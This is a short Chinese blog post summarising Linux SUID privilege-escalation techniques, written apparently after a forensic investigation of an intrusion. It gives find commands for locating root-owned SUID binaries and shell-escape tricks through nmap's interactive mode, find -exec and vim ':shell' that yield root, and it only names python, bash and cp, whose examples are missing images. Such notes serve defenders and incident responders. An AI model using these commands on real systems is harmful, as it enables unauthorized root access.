suid提权

https://www.cnblogs.com/hellobao/articles/17261531.html
上回绿盟取证时发现入侵者有部分木马是root权限运行,取证时用的apache账号,权限不够。在多处发现攻击者可能通过python进行suid提取。所以总结下攻击者可能用到的suid提权。

1.查找root权限的二进制文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

#SUID权限的设置只针对二进制可执行文件,可以通过chmod u+schmod u-s命令赋予、去掉二进制文件u权限。
#SUID是Linux的特殊权限,u代替x执行权限,在执行时进程不是发起者,而是程序的所属者。

python
image.png
bash
image.png
cp(mv、wegt同理)
image.png

2.nmap
老版的nmap(2.02-5.21)有相互的功能--interactive
nmap> !sh
sh-3.2# whoami
root

3.find
touch test
find test -exec whoami ;

4.vim
如果vim以SUID运行,就会继承root用户的权限,可以读取系统中所有的文件
vim/vi
:shell

posted @ 2023-07-14 15:57  打上花火✿  阅读(90)  评论(0编辑  收藏  举报